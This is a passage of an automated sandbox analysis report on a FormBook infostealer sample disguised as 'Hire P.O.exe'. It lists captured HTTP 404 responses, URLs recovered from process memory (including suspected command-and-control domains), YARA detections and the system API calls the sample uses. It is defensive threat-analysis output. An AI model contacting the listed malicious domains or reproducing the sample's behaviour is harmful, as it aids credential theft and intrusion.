                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 08:33:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 08:33:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 08:33:32 GMTContent-Type: text/htmlContent-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 08:33:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 08:33:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 08:33:43 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 08:33:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
                Source: zKwhguHavy.exe, 0000000A.00000002.3142576469.0000000004CB3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.vibixx.site
                Source: zKwhguHavy.exe, 0000000A.00000002.3142576469.0000000004CB3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.vibixx.site/4xim/
                Source: fc.exe, 00000007.00000002.3143948984.0000000007788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: fc.exe, 00000007.00000002.3143948984.0000000007788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: fc.exe, 00000007.00000002.3143948984.0000000007788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: fc.exe, 00000007.00000002.3143948984.0000000007788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: fc.exe, 00000007.00000002.3143948984.0000000007788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: fc.exe, 00000007.00000002.3143948984.0000000007788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: fc.exe, 00000007.00000002.3143948984.0000000007788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: fc.exe, 00000007.00000002.3139261279.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: fc.exe, 00000007.00000003.2110185113.0000000007763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: fc.exe, 00000007.00000002.3139261279.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                Source: fc.exe, 00000007.00000002.3139261279.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: fc.exe, 00000007.00000002.3139261279.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: fc.exe, 00000007.00000002.3139261279.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: fc.exe, 00000007.00000002.3139261279.0000000000651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
                Source: fc.exe, 00000007.00000002.3143948984.0000000007788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
                Source: fc.exe, 00000007.00000002.3143778472.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, fc.exe, 00000007.00000002.3141789917.0000000003C5A000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000308A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
                Source: fc.exe, 00000007.00000002.3141789917.0000000003DEC000.00000004.10000000.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000002.3141043864.000000000321C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.ultrawin23.shop/53y2/?Ht=t/JS3aCWZhQCYNrXnvgf

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.Hire P.O.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.Hire P.O.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3142576469.0000000004C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3140780162.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3140728929.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1863818446.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1865405800.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0042C633 NtClose,5_2_0042C633
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102B60 NtClose,LdrInitializeThunk,5_2_01102B60
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01102DF0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01102C70
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011035C0 NtCreateMutant,LdrInitializeThunk,5_2_011035C0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01104340 NtSetContextThread,5_2_01104340
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01104650 NtSuspendThread,5_2_01104650
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102B80 NtQueryInformationFile,5_2_01102B80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102BA0 NtEnumerateValueKey,5_2_01102BA0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102BF0 NtAllocateVirtualMemory,5_2_01102BF0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102BE0 NtQueryValueKey,5_2_01102BE0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102AB0 NtWaitForSingleObject,5_2_01102AB0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102AD0 NtReadFile,5_2_01102AD0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102AF0 NtWriteFile,5_2_01102AF0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102D10 NtMapViewOfSection,5_2_01102D10
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102D00 NtSetInformationFile,5_2_01102D00
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102D30 NtUnmapViewOfSection,5_2_01102D30
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102DB0 NtEnumerateKey,5_2_01102DB0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102DD0 NtDelayExecution,5_2_01102DD0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102C00 NtQueryInformationProcess,5_2_01102C00
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102C60 NtCreateKey,5_2_01102C60
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102CA0 NtQueryInformationToken,5_2_01102CA0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102CC0 NtQueryVirtualMemory,5_2_01102CC0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102CF0 NtOpenProcess,5_2_01102CF0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102F30 NtCreateSection,5_2_01102F30
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102F60 NtCreateProcessEx,5_2_01102F60
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102F90 NtProtectVirtualMemory,5_2_01102F90
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102FB0 NtResumeThread,5_2_01102FB0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102FA0 NtQuerySection,5_2_01102FA0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102FE0 NtCreateFile,5_2_01102FE0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102E30 NtWriteVirtualMemory,5_2_01102E30
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102E80 NtReadVirtualMemory,5_2_01102E80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102EA0 NtAdjustPrivilegesToken,5_2_01102EA0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102EE0 NtQueueApcThread,5_2_01102EE0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01103010 NtOpenDirectoryObject,5_2_01103010
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01103090 NtSetValueKey,5_2_01103090
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011039B0 NtGetContextThread,5_2_011039B0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01103D10 NtOpenProcessToken,5_2_01103D10
